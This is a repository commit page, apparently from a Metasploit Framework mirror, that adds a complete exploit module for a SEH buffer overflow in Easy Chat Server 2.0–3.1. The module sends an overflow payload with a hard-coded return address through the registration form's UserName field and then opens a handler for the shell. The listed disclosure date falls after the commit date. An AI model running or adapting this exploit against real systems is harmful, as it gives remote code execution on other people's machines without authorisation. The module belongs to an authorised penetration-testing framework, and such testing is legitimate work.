infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit

bug/bundler_fix
Mzack9999 2017-06-20 00:36:59 +02:00
parent 7355817329
commit bc826cb824
1 changed files with 62 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
modules/exploits/windows/http/easychatserver_seh.rb Normal file
View File

@ -0,0 +1,62 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
#include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a buffer overflow during user registration in Easy Chat Server software.
},
'Author' =>
[
'Aitezaz Mohsin', #POC
'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '42186' ],
],
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
],
'DefaultOptions' => {
'RPORT' => 80,
'EXITFUNC' => 'thread',
'ENCODER' => 'x86/alpha_mixed'
},
'DisclosureDate' => 'Oct 09 2017',
'DefaultTarget' => 0))
end
def exploit
sploit = rand_text_alpha_upper(217)
sploit << "\xeb\x06\x90\x90"
sploit << [target.ret].pack('V')
sploit << payload.encoded
sploit << rand_text_alpha_upper(200)
sploit << [target.ret].pack('V')
request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
connect
sock.put(request)
handler
disconnect
end
end